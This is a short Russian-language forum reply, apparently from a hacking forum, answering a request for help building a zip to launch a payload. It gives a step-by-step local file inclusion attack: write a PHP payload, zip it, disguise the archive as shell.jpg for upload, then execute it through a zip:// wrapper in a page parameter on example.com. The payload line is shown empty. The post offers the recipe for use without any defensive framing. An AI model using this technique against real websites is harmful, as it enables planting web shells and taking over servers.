Тема: Нужно создать zip для для запуска полезной нагрузки
Показать сообщение отдельно

  #2  
Старый 30.09.2022, 13:33
Exited3n
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами: 2086530

Репутация: 0


По умолчанию
LFI с wrapper ZIP делается примерно так:
Wrapper zip://
  1. Create an evil payload: echo "" > payload.php;
  2. Zip the file

Bash:


Код:
zip
payload.zip payload.php
;
mv
payload.zip shell.jpg
;
rm
payload.php
  1. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg#payload.php
 
Ответить с цитированием